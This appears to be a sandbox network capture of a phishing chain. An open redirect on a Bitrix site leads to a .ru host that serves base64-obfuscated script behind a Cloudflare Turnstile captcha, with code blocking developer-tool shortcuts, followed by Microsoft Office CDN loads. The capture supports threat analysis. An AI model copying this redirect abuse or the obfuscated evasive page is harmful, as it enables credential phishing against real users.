                                                  Dec 9, 2024 09:34:37.739872932 CET1.1.1.1192.168.2.40xd0c0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.739872932 CET1.1.1.1192.168.2.40xd0c0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.740408897 CET1.1.1.1192.168.2.40xfd69No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.740736008 CET1.1.1.1192.168.2.40x5bbcNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.740752935 CET1.1.1.1192.168.2.40x29e3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.740752935 CET1.1.1.1192.168.2.40x29e3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.005376101 CET1.1.1.1192.168.2.40x5caeNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.005376101 CET1.1.1.1192.168.2.40x5caeNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.005376101 CET1.1.1.1192.168.2.40x5caeNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.005376101 CET1.1.1.1192.168.2.40x5caeNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.047485113 CET1.1.1.1192.168.2.40x8786No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.047485113 CET1.1.1.1192.168.2.40x8786No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:40.047732115 CET1.1.1.1192.168.2.40xe766No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.597251892 CET1.1.1.1192.168.2.40x7ec1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.597263098 CET1.1.1.1192.168.2.40x5b82No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.597263098 CET1.1.1.1192.168.2.40x5b82No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.630233049 CET1.1.1.1192.168.2.40x9fadNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.631063938 CET1.1.1.1192.168.2.40x700dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.631063938 CET1.1.1.1192.168.2.40x700dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:49.105427027 CET1.1.1.1192.168.2.40x6008No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:06.708965063 CET1.1.1.1192.168.2.40x2fc4No error (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:35:06.710834026 CET1.1.1.1192.168.2.40x57cbNo error (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:06.710834026 CET1.1.1.1192.168.2.40x57cbNo error (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:10.192611933 CET1.1.1.1192.168.2.40x95dcNo error (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:10.192611933 CET1.1.1.1192.168.2.40x95dcNo error (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:10.192656994 CET1.1.1.1192.168.2.40x9deeNo error (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.742651939 CET1.1.1.1192.168.2.40x62d8No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.742651939 CET1.1.1.1192.168.2.40x62d8No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.742651939 CET1.1.1.1192.168.2.40x62d8No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.742651939 CET1.1.1.1192.168.2.40x62d8No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.743925095 CET1.1.1.1192.168.2.40x5b91No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.743925095 CET1.1.1.1192.168.2.40x5b91No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:18.086699963 CET1.1.1.1192.168.2.40x4e64No error (0)cdn.graph.office.netcdn.graph.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:18.112135887 CET1.1.1.1192.168.2.40x4db3No error (0)cdn.graph.office.netcdn.graph.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:20.487996101 CET1.1.1.1192.168.2.40x6a37No error (0)cdn.graph.office.netcdn.graph.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:20.489073038 CET1.1.1.1192.168.2.40x7b4dNo error (0)cdn.graph.office.netcdn.graph.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:21.103879929 CET1.1.1.1192.168.2.40x8f6aNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:21.103879929 CET1.1.1.1192.168.2.40x8f6aNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:21.105197906 CET1.1.1.1192.168.2.40xc783No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:21.105197906 CET1.1.1.1192.168.2.40xc783No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:21.105197906 CET1.1.1.1192.168.2.40xc783No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:35:21.105197906 CET1.1.1.1192.168.2.40xc783No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                  • fs.microsoft.com
                                                  • or.smelsgycz.ru
                                                  • https:
                                                    • challenges.cloudflare.com
                                                    • code.jquery.com
                                                    • cdnjs.cloudflare.com
                                                    • cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru
                                                    • js.monitor.azure.com
                                                  • slscr.update.microsoft.com
                                                  • a.nel.cloudflare.com
                                                  • otelrules.azureedge.net
                                                  • www.pixelpromo.ru
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973993.188.41.36805444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 9, 2024 09:34:32.303848028 CET526OUTGET /bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/ HTTP/1.1
                                                  Host: www.pixelpromo.ru
                                                  Connection: keep-alive
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Dec 9, 2024 09:34:33.683633089 CET1015INHTTP/1.1 302 Found
                                                  Date: Mon, 09 Dec 2024 08:34:33 GMT
                                                  Server: Apache/2.2.9 (Debian) PHP/5.3.10-1~dotdeb.0 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
                                                  X-Powered-By: PHP/5.3.10-1~dotdeb.0
                                                  P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
                                                  X-Powered-CMS: Bitrix Site Manager (9b7fc5344419bfd60475db602b6ae7e0)
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  Pragma: no-cache
                                                  Request-URI: https://oR.smelsgycz.ru/OP4lIHE/
                                                  Content-Location: https://oR.smelsgycz.ru/OP4lIHE/
                                                  Set-Cookie: PHPSESSID=cf21177b999121d9f1fcfa278326cbbb; path=/; domain=pixelpromo.ru
                                                  Location: https://oR.smelsgycz.ru/OP4lIHE/
                                                  X-Powered-By: PleskLin
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Length: 20
                                                  Keep-Alive: timeout=15, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=Windows-1251
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44974093.188.41.36805444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 9, 2024 09:35:17.238069057 CET6OUTData Raw: 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973888.221.168.226443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:32 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-12-09 08:34:32 UTC479INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Server: Kestrel
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-neu-z1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  X-OSID: 2
                                                  X-CID: 2
                                                  X-CCC: GB
                                                  Cache-Control: public, max-age=148463
                                                  Date: Mon, 09 Dec 2024 08:34:32 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44974188.221.168.226443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-12-09 08:34:34 UTC534INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                  Cache-Control: public, max-age=47452
                                                  Date: Mon, 09 Dec 2024 08:34:34 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-12-09 08:34:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449743172.67.139.294435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:36 UTC666OUTGET /OP4lIHE/ HTTP/1.1
                                                  Host: or.smelsgycz.ru
                                                  Connection: keep-alive
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:37 UTC1223INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, private
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YsR%2F5LdCm6Cjdfh1BwTct%2BoH%2FIODW233mA6DMOHZXaPJER3JNBJ9Hi6Di%2BW9EEuPE3chVUQL1oTIyP%2B9Kzue1mJuybEGRg3nhwAV6r2VCKtLCM61JzNF1pXRG0SPyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4892&min_rtt=4886&rtt_var=1387&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1570&delivery_rate=576868&cwnd=249&unsent_bytes=0&cid=e2de251ef1563033&ts=144&x=0"
                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6InkzRXYrSnBsanNKeWpocnF5YUtxQnc9PSIsInZhbHVlIjoiMzdtd3UrNDVWRTVlai9vUzFuN04wMHFSUVplcVFNWCt0eU9BNmtBNU5nQ3ZFbkJFeE1RZzFCNWRSa0dDeVpnMXRKVkVGWEExQVVrL2RBVkxaM0k3QXFJeXBQa1lyK3NmaFBCTU5lRnNTMFFxRkZvK0ZkdnhUekwzZ21SRG1rUkQiLCJtYWMiOiIyZTc5Yjc3MmExMzlmNWU1YmJhMzE5ZWEyOTM4YWNkOTg5M2QzM2JhMTg5MGU2NjFjOWEzY2ZjZTUyNDY4MzQ5IiwidGFnIjoiIn0%3D; expires=Mon, 09-Dec-2024 10:34:37 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                  2024-12-09 08:34:37 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 5a 76 4e 6d 31 35 4d 45 5a 61 4d 55 38 33 57 48 5a 75 55 54 63 30 4d 6b 6c 6a 64 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 6b 70 57 55 57 46 75 62 32 4a 42 55 7a 5a 31 59 54 68 43 4f 57 68 58 4d 30 5a 68 56 47 56 4b 56 46 42 72 5a 6d 35 33 53 46 59 34 64 46 46 50 4c 30 46 6e 65 58 55 30 4c 30 64 33 61 6d 56 7a 56 6d 59 31 63 55 39 69 61 33 4a 7a 53 6a 4d 34 54 33 42 7a 62 31 6c 79 52 58 4e 59 4e 47 68 74 55 45 49 78 4f 47 6c 7a 63 45 5a 75 5a 44 5a 4e 4e 6a 56 59 4d 58 70 44 53 55 35 34 56 45 73 31 4e 30 35 44 4c 31 68 4b 52 57 6c 42 65 6b 6c 69 4e 46 64 72 63 30 70 58 56 30 4e 46 5a 6d 39 50 59 58 59 34 64 58 42 79 4e 58 49
                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkZvNm15MEZaMU83WHZuUTc0Mkljd3c9PSIsInZhbHVlIjoiSkpWUWFub2JBUzZ1YThCOWhXM0ZhVGVKVFBrZm53SFY4dFFPL0FneXU0L0d3amVzVmY1cU9ia3JzSjM4T3Bzb1lyRXNYNGhtUEIxOGlzcEZuZDZNNjVYMXpDSU54VEs1N05DL1hKRWlBekliNFdrc0pXV0NFZm9PYXY4dXByNXI
                                                  2024-12-09 08:34:37 UTC1369INData Raw: 38 31 39 0d 0a 3c 21 2d 2d 20 4e 65 76 65 72 20 67 69 76 65 20 69 6e 20 65 78 63 65 70 74 20 74 6f 20 63 6f 6e 76 69 63 74 69 6f 6e 73 20 6f 66 20 68 6f 6e 6f 72 20 61 6e 64 20 67 6f 6f 64 20 73 65 6e 73 65 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 77 61 79 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 69 73 20 74 6f 20 71 75 69 74 20 74 61 6c 6b 69 6e 67 20 61 6e 64 20 62 65 67 69 6e 20 64 6f 69 6e 67 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 56 57 69 35 7a 62 57 56 73 63 32 64 35 59 33 6f 75 63 6e 55 76 54 31 41 30 62 45 6c 49 52 53 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f
                                                  Data Ascii: 819... Never give in except to convictions of honor and good sense. --><script>/* The way to get started is to quit talking and begin doing. */if(atob("aHR0cHM6Ly9VWi5zbWVsc2d5Y3oucnUvT1A0bElIRS8=") == "nomatch"){document.write(decodeURICompo
                                                  2024-12-09 08:34:37 UTC711INData Raw: 55 30 39 49 64 46 70 42 54 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 46 44 65 56 4e 50 53 48 52 61 51 55 30 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 49 32 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56
                                                  Data Ascii: U09IdFpBTSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2FDeVNPSHRaQU0uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTI2cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGV
                                                  2024-12-09 08:34:37 UTC1369INData Raw: 34 35 39 37 0d 0a 54 41 77 63 6d 56 74 49 43 73 67 4c 6a 4e 32 64 79 6b 37 66 51 30 4b 49 32 46 44 65 56 4e 50 53 48 52 61 51 55 30 67 4c 6d 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 43 31 6a 5a 57 35 30 5a 58 4a 37 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4f 6d 4e 6c 62 6e 52 6c 63 69 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 32 46 44 65 56 4e 50 53 48 52 61 51 55 30 75 62 58 51 74 4e 58 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 4e 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 68 51 33 6c 54 54 30 68 30 57 6b 46 4e 49 43 35 74 64 43 30 30 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 78 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 59 55
                                                  Data Ascii: 4597TAwcmVtICsgLjN2dyk7fQ0KI2FDeVNPSHRaQU0gLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI2FDeVNPSHRaQU0ubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNhQ3lTT0h0WkFNIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojYU
                                                  2024-12-09 08:34:37 UTC1369INData Raw: 64 6d 56 75 64 43 35 68 62 48 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 74 5a 58 52 68 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 46 73 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 32 4e 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 31 6c 64 47 46 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4f 44 55 70 44 51 6f 67 49 43 41 67 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a
                                                  Data Ascii: dmVudC5hbHRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZ
                                                  2024-12-09 08:34:37 UTC1369INData Raw: 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 38 5a 47 6c 32 49 47 6c 6b 50 53 4a 30 56 46 52 77 52 46 56 4b 52 57 35 31 49 69 42 6a 62 47 46 7a 63 7a 30 69 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 2b 44 51 6f 38 5a 6d 39 79 62 53 42 70 5a 44 30 69 65 6e 46 71 64 55 70 69 63 55 68 33 54 43 49 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 5a 6c 39 30 64 58 4a 75 63 33 52 70 62 47 55 69 49 47 6c 6b 50 53 4a 6a 5a 69 49 2b 50 43 39 6b 61 58 59 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69
                                                  Data Ascii: XB0Y2hhLWNvbnRhaW5lciI+DQo8ZGl2IGlkPSJ0VFRwRFVKRW51IiBjbGFzcz0ianVzdGlmeS1jb250ZW50LWNlbnRlciI+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciI+DQo8Zm9ybSBpZD0ienFqdUpicUh3TCI+DQo8ZGl2IGNsYXNzPSJjZl90dXJuc3RpbGUiIGlkPSJjZiI+PC9kaXY+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0i
                                                  2024-12-09 08:34:37 UTC1369INData Raw: 64 4f 59 79 35 76 62 6e 4e 31 59 6d 31 70 64 43 41 39 49 47 5a 31 62 6d 4e 30 61 57 39 75 49 43 68 6c 64 6d 56 75 64 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 48 30 37 44 51 6f 67 49 43 41 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 32 56 30 52 57 78 6c 62 57 56 75 64 45 4a 35 53 57 51 6f 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 6b 75 64 6d 46 73 64 57 55 67 50 53 41 6e 63 6d 5a 4b 59 79 63 37 44 51 6f 67 49 43 41 67 64 6d 46 79 49 47 74 50 56 33 52 6c 65 47 70 78 57 47 45 67 50 53 41 69 4c 69 34 76 61 33 42 59 64 30 56 4b 52 48 68 47 57 6d 67 78 54 6a 46 68 51 54 59 33 65 56 42 47 4e 45 39 30 65 47 52 32 5a 6a 6c 48 53 56 70 52 55
                                                  Data Ascii: dOYy5vbnN1Ym1pdCA9IGZ1bmN0aW9uIChldmVudCkgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIH07DQogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInBhZ2VsaW5rIikudmFsdWUgPSAncmZKYyc7DQogICAgdmFyIGtPV3RleGpxWGEgPSAiLi4va3BYd0VKRHhGWmgxTjFhQTY3eVBGNE90eGR2ZjlHSVpRU
